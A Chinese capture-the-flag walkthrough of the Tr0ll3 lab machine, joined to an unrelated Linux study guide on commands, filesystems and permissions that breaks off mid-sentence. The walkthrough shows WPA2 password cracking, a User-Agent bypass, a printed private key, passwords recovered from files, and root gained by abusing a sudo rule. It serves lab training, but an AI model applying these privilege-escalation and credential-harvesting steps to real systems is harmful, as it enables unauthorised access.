`this_will_surely_work`目录中的文件`redpill`包含字符串`step2:Password1!`。我们的直觉告诉我们,这些必须是下一个凭据。但是如果我们尝试使用给定的信息登录,我们只会收到一条错误消息。再一次,这只是一个诱饵。 使用该命令`find / -type f -perm 0777 2>/dev/null`,我们可以列出所有用户都可以读取和编辑的文件,无论其所有者如何。这使我们能够识别第一个实际线索: ``` start@Tr0ll3:~/redpill$ find / -type f -perm 0777 2>/dev/null /var/log/.dist-manage/wytshadow.cap /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt ``` 一方面,我们可以读取`wytshadow.cap`目录中的文件 `/var/log/.dist-manage/`。这似乎是对包括 WPA2 握手在内的网络流量的捕获。 下载到本地进行WIFI密码爆破 ![image-20220718142025469](../../.gitbook/assets/image-20220718142025469.png) ``` aircrack-ng -w gold_star.txt wytshadow.cap ``` ![image-20220718145030854](../../.gitbook/assets/image-20220718145030854.png) wytshadow用户爆破出密码为`gaUoCe34t1` ``` start@Tr0ll3:/tmp$ su wytshadow Password: wytshadow@Tr0ll3:/tmp$ id uid=1003(wytshadow) gid=1003(wytshadow) groups=1003(wytshadow) ``` 如果我们查看 的主目录`wytshadow`,该文件会`oohfun`立即引起我们的注意。该文件设置了 SUID 位,它允许我们以用户的权限运行程序`genphlux`。 ``` wytshadow@Tr0ll3:~$ ls -al total 40 drwx------ 4 wytshadow wytshadow 4096 Aug 2 2019 . drwxr-xr-x 10 root root 4096 Jun 19 2015 .. -rw-r--r-- 1 wytshadow wytshadow 220 Jun 17 2015 .bash_logout -rw-r--r-- 1 wytshadow wytshadow 3637 Jun 17 2015 .bashrc drwx------ 2 wytshadow wytshadow 4096 Jun 17 2015 .cache drwx------ 3 wytshadow wytshadow 4096 Aug 1 2019 .gnupg -rwsrwxrwx 1 genphlux root 8566 Jun 17 2015 oohfun -rw-r--r-- 1 wytshadow wytshadow 675 Jun 17 2015 .profile ``` 查看sudo列表 ``` wytshadow@Tr0ll3:~$ sudo -l [sudo] password for wytshadow: Matching Defaults entries for wytshadow on Tr0ll3: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User wytshadow may run the following commands on Tr0ll3: (root) /usr/sbin/service nginx start ``` 然而,当我们实际运行时`oohfun`,我们只是不断地得到输出`iM Cr@zY L1k3 AAA LYNX`: ![image-20220718143138158](../../.gitbook/assets/image-20220718143138158.png) 如果我们使用 来检查文件内容`strings`,我们可以看到它包含以下行: ``` /lol/bin/run.sh -b 0.0.0.0 ``` ![image-20220718143216692](../../.gitbook/assets/image-20220718143216692.png) ``` wytshadow@Tr0ll3:~$ cat /lol/bin/run.sh #!/bin/sh while true;do echo "iM Cr@zY L1k3 AAA LYNX"; done ``` 我们可以看到`wytshadow`允许用户启动nginx web server服务,这就是我们接下来要做的: ``` wytshadow@Tr0ll3:~$ sudo service nginx start ``` 使用 对打开的端口进行本地检查以`netstat`确认 Web 服务器的成功启动。我们现在可以在端口 8080 上看到新服务。 ![image-20220718143331983](../../.gitbook/assets/image-20220718143331983.png) 但是,我们无法访问 Web 服务,因为所有请求都被拒绝并显示`403 Forbidden`错误消息。 ![image-20220718143415981](../../.gitbook/assets/image-20220718143415981.png) 为了缩小问题范围,我们打开文件`/etc/nginx/sites-ed/default`并查看 nginx Web 服务器的默认配置。一开始,我们注意到以下块: ``` server { listen 8080 default_server; listen [::]:8080 default_server; if ($http_user_agent !~ "Lynx*"){ return 403; } ``` 如果请求不包含 user-agent `Lynx`,服务器将始终以 403 错误响应。由于该文件不幸是只读的,我们无法更改配置。但是,使用 curl 我们可以以预期的格式附加我们自己的用户代理标头。 ``` ┌──(root💀kali)-[~/Desktop] └─# curl -H "User-Agent: Lynx Basto" http://192.168.32.174:8080 genphlux:HF9nd0cR! ``` ``` wytshadow@Tr0ll3:~$ su genphlux Password: genphlux@Tr0ll3:/home/wytshadow$ id uid=1004(genphlux) gid=1004(genphlux) groups=1004(genphlux) ``` 查看当前目录 ``` genphlux@Tr0ll3:~$ ls -al total 44 drwx------ 4 genphlux genphlux 4096 Aug 2 2019 . drwxr-xr-x 10 root root 4096 Jun 19 2015 .. -rw-r--r-- 1 genphlux genphlux 220 Jun 17 2015 .bash_logout -rw-r--r-- 1 genphlux genphlux 3637 Jun 17 2015 .bashrc drwx------ 2 genphlux genphlux 4096 Jun 17 2015 .cache drwx------ 3 genphlux genphlux 4096 Aug 1 2019 .gnupg -rw-rw-r-- 1 genphlux genphlux 1675 Jun 18 2015 maleus -rw-r--r-- 1 genphlux genphlux 675 Jun 17 2015 .profile -rw------- 1 genphlux genphlux 5649 Jun 17 2015 .viminfo -rw-rw-r-- 1 genphlux genphlux 931 Aug 2 2019 xlogin ``` 该文件`xlogin`只是一个 HTML 页面,它是 web 目录的目录列表,对`/xlogin`我们没有任何帮助。 ``` genphlux@Tr0ll3:~$ cat xlogin <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /xlogin</title> </head> <body> <h1>Index of /xlogin</h1> <table> <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr> <tr><th colspan="5"><hr></th></tr> <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="maleus">maleus</a></td><td align="right">2015-06-18 00:27 </td><td align="right">1.6K</td><td>&nbsp;</td></tr> <tr><th colspan="5"><hr></th></tr> </table> <address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address> </body></html> ``` 相反,该文件`maleus`更有趣。它似乎包含一个 RSA 密钥,最有可能通过 SSH 连接。 ``` genphlux@Tr0ll3:~$ cat maleus -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4 u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g 7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb 1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6 syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO 2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb 5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9 xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK -----END RSA PRIVATE KEY----- ``` 现在我们尝试使用用户的私钥登录`maleus`。但是,SSH 服务禁止我们使用权限设置过宽的证书文件。因此,我们必须先提前缩小文件权限。 ``` genphlux@Tr0ll3:~$ chmod 600 maleus genphlux@Tr0ll3:~$ ssh -i maleus maleus@127.0.0.1 The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:RhN530LgY0ZFQupkWWarB5Fnx9EjijFyl3zOp3scJ30. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts. Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage New release '20.04.4 LTS' available. Run 'do-release-upgrade' to upgrade to it. maleus@Tr0ll3:~$ ``` 我们也会被文件误导`dont_even_bother`。如果我们运行它,系统会提示我们输入密码。 ![image-20220718144106828](../../.gitbook/assets/image-20220718144106828.png) 快速查看文件中`strings`包含的内容将显示所需的值: ``` xl8Fpx%6 ``` ![image-20220718144201726](../../.gitbook/assets/image-20220718144201726.png) 所以看起来我们仍然没有得到这个用户的任何地方。 ![image-20220718144224699](../../.gitbook/assets/image-20220718144224699.png) 该文件`.viminfo`包含在 Vim 文本编辑器中键入的命令的历史记录。除其他外,该文件还包含以下摘录,其中似乎包括用户密码的输入: ``` maleus@Tr0ll3:~$ cat .viminfo # This viminfo file was generated by Vim 7.4. # You may edit it if you're careful! # Value of 'encoding' when this file was written *encoding=utf-8 # hlsearch on (H) or off (h): ~h # Command Line History (newest to oldest): :wq :q :q! :!shell # Search String History (newest to oldest): # Expression History (newest to oldest): # Input Line History (newest to oldest): # Input Line History (newest to oldest): # Registers: ""1 LINE 0 passwd "2 LINE 0 B^slc8I$ "3 LINE 0 passswd # File marks: # Jumplist (newest first): # History of marks within files (newest to oldest): + 25 62 ``` 查看sudo列表 ``` maleus@Tr0ll3:~$ sudo -l [sudo] password for maleus: Matching Defaults entries for maleus on Tr0ll3: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User maleus may run the following commands on Tr0ll3: (root) /home/maleus/dont_even_bother ``` ``` maleus@Tr0ll3:~$ echo "bash" > dont_even_bother maleus@Tr0ll3:~$ sudo ./dont_even_bother root@Tr0ll3:~# id uid=0(root) gid=0(root) groups=0(root) root@Tr0ll3:~# cat /root/flag.txt You are truly a Jedi! Twitter Proof: Pr00fThatTh3L33tHax0rG0tTheFl@g!! @Maleus21 ```
sec-knowleage
# Linux <!-- GFM-TOC --> * [Linux](#linux) * [前言](#前言) * [一、常用操作以及概念](#一常用操作以及概念) * [快捷键](#快捷键) * [求助](#求助) * [关机](#关机) * [PATH](#path) * [sudo](#sudo) * [包管理工具](#包管理工具) * [发行版](#发行版) * [VIM 三个模式](#vim-三个模式) * [GNU](#gnu) * [开源协议](#开源协议) * [二、磁盘](#二磁盘) * [磁盘接口](#磁盘接口) * [磁盘的文件名](#磁盘的文件名) * [三、分区](#三分区) * [分区表](#分区表) * [开机检测程序](#开机检测程序) * [四、文件系统](#四文件系统) * [分区与文件系统](#分区与文件系统) * [组成](#组成) * [文件读取](#文件读取) * [磁盘碎片](#磁盘碎片) * [block](#block) * [inode](#inode) * [目录](#目录) * [日志](#日志) * [挂载](#挂载) * [目录配置](#目录配置) * [五、文件](#五文件) * [文件属性](#文件属性) * [文件与目录的基本操作](#文件与目录的基本操作) * [修改权限](#修改权限) * [默认权限](#默认权限) * [目录的权限](#目录的权限) * [链接](#链接) * [获取文件内容](#获取文件内容) * [指令与文件搜索](#指令与文件搜索) * [六、压缩与打包](#六压缩与打包) * [压缩文件名](#压缩文件名) * [压缩指令](#压缩指令) * [打包](#打包) * [七、Bash](#七bash) * [特性](#特性) * [变量操作](#变量操作) * [指令搜索顺序](#指令搜索顺序) * [数据流重定向](#数据流重定向) * [八、管道指令](#八管道指令) * [提取指令](#提取指令) * [排序指令](#排序指令) * [双向输出重定向](#双向输出重定向) * [字符转换指令](#字符转换指令) * [分区指令](#分区指令) * [九、正则表达式](#九正则表达式) * [grep](#grep) * [printf](#printf) * [awk](#awk) * [十、进程管理](#十进程管理) * [查看进程](#查看进程) * [进程状态](#进程状态) * [SIGCHLD](#sigchld) * [wait()](#wait) * [waitpid()](#waitpid) * [孤儿进程](#孤儿进程) * [僵尸进程](#僵尸进程) * [参考资料](#参考资料) <!-- GFM-TOC --> ## 前言 为了便于理解,本文从常用操作和概念开始讲起。虽然已经尽量做到简化,但是涉及到的内容还是有点多。在面试中,Linux 知识点相对于网络和操作系统等知识点而言不是那么重要,只需要重点掌握一些原理和命令即可。为了方便大家准备面试,在此先将一些比较重要的知识点列出来: - 能简单使用 cat,grep,cut 等命令进行一些操作; - 文件系统相关的原理,inode 和 block 等概念,数据恢复; - 硬链接与软链接; - 进程管理相关,僵尸进程与孤儿进程,SIGCHLD 。 ## 一、常用操作以及概念 ### 快捷键 - Tab:命令和文件名补全; - Ctrl+C:中断正在运行的程序; - Ctrl+D:结束键盘输入(End Of File,EOF) ### 求助 #### 1. --help 指令的基本用法与选项介绍。 #### 2. man man 是 manual 的缩写,将指令的具体信息显示出来。 当执行 `man date` 时,有 DATE(1) 出现,其中的数字代表指令的类型,常用的数字及其类型如下: | 代号 | 类型 | | :--: | -- | | 1 | 用户在 shell 环境中可以操作的指令或者可执行文件 | | 5 | 配置文件 | | 8 | 系统管理员可以使用的管理指令 | #### 3. info info 与 man 类似,但是 info 将文档分成一个个页面,每个页面可以跳转。 #### 4. doc /usr/share/doc 存放着软件的一整套说明文件。 ### 关机 #### 1. who 在关机前需要先使用 who 命令查看有没有其它用户在线。 #### 2. sync 为了加快对磁盘文件的读写速度,位于内存中的文件数据不会立即同步到磁盘,因此关机之前需要先进行 sync 同步操作。 #### 3. shutdown ```html ## shutdown [-krhc] 时间 [信息] -k : 不会关机,只是发送警告信息,通知所有在线的用户 -r : 将系统的服务停掉后就重新启动 -h : 将系统的服务停掉后就立即关机 -c : 取消已经在进行的 shutdown ``` ### PATH 可以在环境变量 PATH 中声明可执行文件的路径,路径之间用 : 分隔。 ```html /usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/dmtsai/.local/bin:/home/dmtsai/bin ``` ### sudo sudo 允许一般用户使用 root 可执行的命令,不过只有在 /etc/sudoers 配置文件中添加的用户才能使用该指令。 ### 包管理工具 RPM 和 DPKG 为最常见的两类软件包管理工具: - RPM 全称为 Redhat Package Manager,最早由 Red Hat 公司制定实施,随后被 GNU 开源操作系统接受并成为许多 Linux 系统的既定软件标准。YUM 基于 RPM,具有依赖管理和软件升级功能。 - 与 RPM 竞争的是基于 Debian 操作系统的 DEB 软件包管理工具 DPKG,全称为 Debian Package,功能方面与 RPM 相似。 ### 发行版 Linux 发行版是 Linux 内核及各种应用软件的集成版本。 | 基于的包管理工具 | 商业发行版 | 社区发行版 | | :--: | :--: | :--: | | RPM | Red Hat | Fedora / CentOS | | DPKG | Ubuntu | Debian | ### VIM 三个模式 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/image-20191209002818626.png"/> </div><br> - 一般指令模式(Command mode):VIM 的默认模式,可以用于移动游标查看内容; - 编辑模式(Insert mode):按下 "i" 等按键之后进入,可以对文本进行编辑; - 指令列模式(Bottom-line mode):按下 ":" 按键之后进入,用于保存退出等操作。 在指令列模式下,有以下命令用于离开或者保存文件。 | 命令 | 作用 | | :--: | :--: | | :w | 写入磁盘| | :w! | 当文件为只读时,强制写入磁盘。到底能不能写入,与用户对该文件的权限有关 | | :q | 离开 | | :q! | 强制离开不保存 | | :wq | 写入磁盘后离开 | | :wq!| 强制写入磁盘后离开 | ### GNU GNU 计划,译为革奴计划,它的目标是创建一套完全自由的操作系统,称为 GNU,其内容软件完全以 GPL 方式发布。其中 GPL 全称为 GNU 通用公共许可协议(GNU General Public License),包含了以下内容: - 以任何目的运行此程序的自由; - 再复制的自由; - 改进此程序,并公开发布改进的自由。 ### 开源协议 - [Choose an open source license](https://choosealicense.com/) - [如何选择开源许可证?](http://www.ruanyifeng.com/blog/2011/05/how_to_choose_free_software_licenses.html) ## 二、磁盘 ### 磁盘接口 #### 1. IDE IDE(ATA)全称 Advanced Technology Attachment,接口速度最大为 133MB/s,因为并口线的抗干扰性太差,且排线占用空间较大,不利电脑内部散热,已逐渐被 SATA 所取代。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/924914c0-660c-4e4a-bbc0-1df1146e7516.jpg" width="400"/> </div><br> #### 2. SATA SATA 全称 Serial ATA,也就是使用串口的 ATA 接口,抗干扰性强,且对数据线的长度要求比 ATA 低很多,支持热插拔等功能。SATA-II 的接口速度为 300MB/s,而 SATA-III 标准可达到 600MB/s 的传输速度。SATA 的数据线也比 ATA 的细得多,有利于机箱内的空气流通,整理线材也比较方便。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/f9f2a16b-4843-44d1-9759-c745772e9bcf.jpg" width=""/> </div><br> #### 3. SCSI SCSI 全称是 Small Computer System Interface(小型机系统接口),SCSI 硬盘广为工作站以及个人电脑以及服务器所使用,因此会使用较为先进的技术,如碟片转速 15000rpm 的高转速,且传输时 CPU 占用率较低,但是单价也比相同容量的 ATA 及 SATA 硬盘更加昂贵。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/f0574025-c514-49f5-a591-6d6a71f271f7.jpg" width=""/> </div><br> #### 4. SAS SAS(Serial Attached SCSI)是新一代的 SCSI 技术,和 SATA 硬盘相同,都是采取序列式技术以获得更高的传输速度,可达到 6Gb/s。此外也通过缩小连接线改善系统内部空间等。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/6729baa0-57d7-4817-b3aa-518cbccf824c.jpg" width=""/> </div><br> ### 磁盘的文件名 Linux 中每个硬件都被当做一个文件,包括磁盘。磁盘以磁盘接口类型进行命名,常见磁盘的文件名如下: - IDE 磁盘:/dev/hd[a-d] - SATA/SCSI/SAS 磁盘:/dev/sd[a-p] 其中文件名后面的序号的确定与系统检测到磁盘的顺序有关,而与磁盘所插入的插槽位置无关。 ## 三、分区 ### 分区表 磁盘分区表主要有两种格式,一种是限制较多的 MBR 分区表,一种是较新且限制较少的 GPT 分区表。 #### 1. MBR MBR 中,第一个扇区最重要,里面有主要开机记录(Master boot record, MBR)及分区表(partition table),其中主要开机记录占 446 bytes,分区表占 64 bytes。 分区表只有 64 bytes,最多只能存储 4 个分区,这 4 个分区为主分区(Primary)和扩展分区(Extended)。其中扩展分区只有一个,它使用其它扇区来记录额外的分区表,因此通过扩展分区可以分出更多分区,这些分区称为逻辑分区。 Linux 也把分区当成文件,分区文件的命名方式为:磁盘文件名 + 编号,例如 /dev/sda1。注意,逻辑分区的编号从 5 开始。 #### 2. GPT 扇区是磁盘的最小存储单位,旧磁盘的扇区大小通常为 512 bytes,而最新的磁盘支持 4 k。GPT 为了兼容所有磁盘,在定义扇区上使用逻辑区块地址(Logical Block Address, LBA),LBA 默认大小为 512 bytes。 GPT 第 1 个区块记录了主要开机记录(MBR),紧接着是 33 个区块记录分区信息,并把最后的 33 个区块用于对分区信息进行备份。这 33 个区块第一个为 GPT 表头纪录,这个部份纪录了分区表本身的位置与大小和备份分区的位置,同时放置了分区表的校验码 (CRC32),操作系统可以根据这个校验码来判断 GPT 是否正确。若有错误,可以使用备份分区进行恢复。 GPT 没有扩展分区概念,都是主分区,每个 LBA 可以分 4 个分区,因此总共可以分 4 * 32 = 128 个分区。 MBR 不支持 2.2 TB 以上的硬盘,GPT 则最多支持到 2<sup>33</sup> TB = 8 ZB。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/GUID_Partition_Table_Scheme.svg.png" width="400"/> </div><br> ### 开机检测程序 #### 1. BIOS BIOS(Basic Input/Output System,基本输入输出系统),它是一个固件(嵌入在硬件中的软件),BIOS 程序存放在断电后内容不会丢失的只读内存中。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/50831a6f-2777-46ea-a571-29f23c85cc21.jpg"/> </div><br> BIOS 是开机的时候计算机执行的第一个程序,这个程序知道可以开机的磁盘,并读取磁盘第一个扇区的主要开机记录(MBR),由主要开机记录(MBR)执行其中的开机管理程序,这个开机管理程序会加载操作系统的核心文件。 主要开机记录(MBR)中的开机管理程序提供以下功能:选单、载入核心文件以及转交其它开机管理程序。转交这个功能可以用来实现多重引导,只需要将另一个操作系统的开机管理程序安装在其它分区的启动扇区上,在启动开机管理程序时,就可以通过选单选择启动当前的操作系统或者转交给其它开机管理程序从而启动另一个操作系统。 下图中,第一扇区的主要开机记录(MBR)中的开机管理程序提供了两个选单:M1、M2,M1 指向了 Windows 操作系统,而 M2 指向其它分区的启动扇区,里面包含了另外一个开机管理程序,提供了一个指向 Linux 的选单。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/f900f266-a323-42b2-bc43-218fdb8811a8.jpg" width="600"/> </div><br> 安装多重引导,最好先安装 Windows 再安装 Linux。因为安装 Windows 时会覆盖掉主要开机记录(MBR),而 Linux 可以选择将开机管理程序安装在主要开机记录(MBR)或者其它分区的启动扇区,并且可以设置开机管理程序的选单。 #### 2. UEFI BIOS 不可以读取 GPT 分区表,而 UEFI 可以。 ## 四、文件系统 ### 分区与文件系统 对分区进行格式化是为了在分区上建立文件系统。一个分区通常只能格式化为一个文件系统,但是磁盘阵列等技术可以将一个分区格式化为多个文件系统。 ### 组成 最主要的几个组成部分如下: - inode:一个文件占用一个 inode,记录文件的属性,同时记录此文件的内容所在的 block 编号; - block:记录文件的内容,文件太大时,会占用多个 block。 除此之外还包括: - superblock:记录文件系统的整体信息,包括 inode 和 block 的总量、使用量、剩余量,以及文件系统的格式与相关信息等; - block bitmap:记录 block 是否被使用的位图。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/BSD_disk.png" width="800"/> </div><br> ### 文件读取 对于 Ext2 文件系统,当要读取一个文件的内容时,先在 inode 中查找文件内容所在的所有 block,然后把所有 block 的内容读出来。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/12a65cc6-20e0-4706-9fe6-3ba49413d7f6.png" width="500px"> </div><br> 而对于 FAT 文件系统,它没有 inode,每个 block 中存储着下一个 block 的编号。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/5b718e86-7102-4bb6-8ca5-d1dd791530c5.png" width="500px"> </div><br> ### 磁盘碎片 指一个文件内容所在的 block 过于分散,导致磁盘磁头移动距离过大,从而降低磁盘读写性能。 ### block 在 Ext2 文件系统中所支持的 block 大小有 1K,2K 及 4K 三种,不同的大小限制了单个文件和文件系统的最大大小。 | 大小 | 1KB | 2KB | 4KB | | :---: | :---: | :---: | :---: | | 最大单一文件 | 16GB | 256GB | 2TB | | 最大文件系统 | 2TB | 8TB | 16TB | 一个 block 只能被一个文件所使用,未使用的部分直接浪费了。因此如果需要存储大量的小文件,那么最好选用比较小的 block。 ### inode inode 具体包含以下信息: - 权限 (read/write/excute); - 拥有者与群组 (owner/group); - 容量; - 建立或状态改变的时间 (ctime); - 最近读取时间 (atime); - 最近修改时间 (mtime); - 定义文件特性的旗标 (flag),如 SetUID...; - 该文件真正内容的指向 (pointer)。 inode 具有以下特点: - 每个 inode 大小均固定为 128 bytes (新的 ext4 与 xfs 可设定到 256 bytes); - 每个文件都仅会占用一个 inode。 inode 中记录了文件内容所在的 block 编号,但是每个 block 非常小,一个大文件随便都需要几十万的 block。而一个 inode 大小有限,无法直接引用这么多 block 编号。因此引入了间接、双间接、三间接引用。间接引用让 inode 记录的引用 block 块记录引用信息。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/inode_with_signatures.jpg" width="600"/> </div><br> ### 目录 建立一个目录时,会分配一个 inode 与至少一个 block。block 记录的内容是目录下所有文件的 inode 编号以及文件名。 可以看到文件的 inode 本身不记录文件名,文件名记录在目录中,因此新增文件、删除文件、更改文件名这些操作与目录的写权限有关。 ### 日志 如果突然断电,那么文件系统会发生错误,例如断电前只修改了 block bitmap,而还没有将数据真正写入 block 中。 ext3/ext4 文件系统引入了日志功能,可以利用日志来修复文件系统。 ### 挂载 挂载利用目录作为文件系统的进入点,也就是说,进入目录之后就可以读取文件系统的数据。 ### 目录配置 为了使不同 Linux 发行版本的目录结构保持一致性,Filesystem Hierarchy Standard (FHS) 规定了 Linux 的目录结构。最基础的三个目录如下: - / (root, 根目录) - /usr (unix software resource):所有系统默认软件都会安装到这个目录; - /var (variable):存放系统或程序运行过程中的数据文件。 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/linux-filesystem.png" width=""/> </div><br> ## 五、文件 ### 文件属性 用户分为三种:文件拥有者、群组以及其它人,对不同的用户有不同的文件权限。 使用 ls 查看一个文件时,会显示一个文件的信息,例如 `drwxr-xr-x 3 root root 17 May 6 00:14 .config`,对这个信息的解释如下: - drwxr-xr-x:文件类型以及权限,第 1 位为文件类型字段,后 9 位为文件权限字段 - 3:链接数 - root:文件拥有者 - root:所属群组 - 17:文件大小 - May 6 00:14:文件最后被修改的时间 - .config:文件名 常见的文件类型及其含义有: - d:目录 - -:文件 - l:链接文件 9 位的文件权限字段中,每 3 个为一组,共 3 组,每一组分别代表对文件拥有者、所属群组以及其它人的文件权限。一组权限中的 3 位分别为 r、w、x 权限,表示可读、可写、可执行。 文件时间有以下三种: - modification time (mtime):文件的内容更新就会更新; - status time (ctime):文件的状态(权限、属性)更新就会更新; - access time (atime):读取文件时就会更新。 ### 文件与目录的基本操作 #### 1. ls 列出文件或者目录的信息,目录的信息就是其中包含的文件。 ```html ## ls [-aAdfFhilnrRSt] file|dir -a :列出全部的文件 -d :仅列出目录本身 -l :以长数据串行列出,包含文件的属性与权限等等数据 ``` #### 2. cd 更换当前目录。 ``` cd [相对路径或绝对路径] ``` #### 3. mkdir 创建目录。 ``` ## mkdir [-mp] 目录名称 -m :配置目录权限 -p :递归创建目录 ``` #### 4. rmdir 删除目录,目录必须为空。 ```html rmdir [-p] 目录名称 -p :递归删除目录 ``` #### 5. touch 更新文件时间或者建立新文件。 ```html ## touch [-acdmt] filename -a : 更新 atime -c : 更新 ctime,若该文件不存在则不建立新文件 -m : 更新 mtime -d : 后面可以接更新日期而不使用当前日期,也可以使用 --date="日期或时间" -t : 后面可以接更新时间而不使用当前时间,格式为[YYYYMMDDhhmm] ``` #### 6. cp 复制文件。如果源文件有两个以上,则目的文件一定要是目录才行。 ```html cp [-adfilprsu] source destination -a :相当于 -dr --preserve=all -d :若来源文件为链接文件,则复制链接文件属性而非文件本身 -i :若目标文件已经存在时,在覆盖前会先询问 -p :连同文件的属性一起复制过去 -r :递归复制 -u :destination 比 source 旧才更新 destination,或 destination 不存在的情况下才复制 --preserve=all :除了 -p 的权限相关参数外,还加入 SELinux 的属性, links, xattr 等也复制了 ``` #### 7. rm 删除文件。 ```html ## rm [-fir] 文件或目录 -r :递归删除 ``` #### 8. mv 移动文件。 ```html ## mv [-fiu] source destination ## mv [options] source1 source2 source3 .... directory -f : force 强制的意思,如果目标文件已经存在,不会询问而直接覆盖 ``` ### 修改权限 可以将一组权限用数字来表示,此时一组权限的 3 个位当做二进制数字的位,从左到右每个位的权值为 4、2、1,即每个权限对应的数字权值为 r : 4、w : 2、x : 1。 ```html ## chmod [-R] xyz dirname/filename ``` 示例:将 .bashrc 文件的权限修改为 -rwxr-xr--。 ```html ## chmod 754 .bashrc ``` 也可以使用符号来设定权限。 ```html ## chmod [ugoa] [+-=] [rwx] dirname/filename - u:拥有者 - g:所属群组 - o:其他人 - a:所有人 - +:添加权限 - -:移除权限 - =:设定权限 ``` 示例:为 .bashrc 文件的所有用户添加写权限。 ```html ## chmod a+w .bashrc ``` ### 默认权限 - 文件默认权限:文件默认没有可执行权限,因此为 666,也就是 -rw-rw-rw- 。 - 目录默认权限:目录必须要能够进入,也就是必须拥有可执行权限,因此为 777 ,也就是 drwxrwxrwx。 可以通过 umask 设置或者查看默认权限,通常以掩码的形式来表示,例如 002 表示其它用户的权限去除了一个 2 